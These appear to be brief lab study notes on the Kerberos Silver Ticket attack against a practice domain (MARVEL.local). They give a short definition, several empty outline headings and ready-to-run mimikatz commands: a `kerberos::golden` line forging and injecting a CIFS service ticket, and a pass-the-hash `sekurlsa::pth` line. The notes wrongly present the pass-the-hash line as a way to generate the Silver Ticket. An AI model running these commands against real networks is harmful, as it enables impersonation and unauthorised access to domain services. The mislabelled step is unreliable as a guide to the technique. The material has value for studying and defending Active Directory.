Silver Ticket Attack

A Silver Ticket is a forged Kerberos service ticket (TGS) that allows an attacker to authenticate to a specific service on a target machine without needing to interact with the Domain Controller.

It's stealthier than a Golden Ticket because it only affects one service instead of the whole domain.


🛠️ How Silver Tickets Work

  1. Understand Kerberos Authentication

  2. Silver Ticket Exploit


🛠️ How to Perform a Silver Ticket Attack

1️⃣ Get the NTLM Hash of the Service Account

2️⃣ Generate the Silver Ticket

mimikatz.exe
sekurlsa::pth /user:Administrator /domain:MARVEL.local /ntlm:<service_account_ntlm> /run:cmd.exe

OR

kerberos::golden /domain:MARVEL.local /sid:S-1-5-21-xxxxxxx /target:THEPUNISHER /service:cifs /rc4:<service_account_ntlm> /user:tstark /id:500 /ptt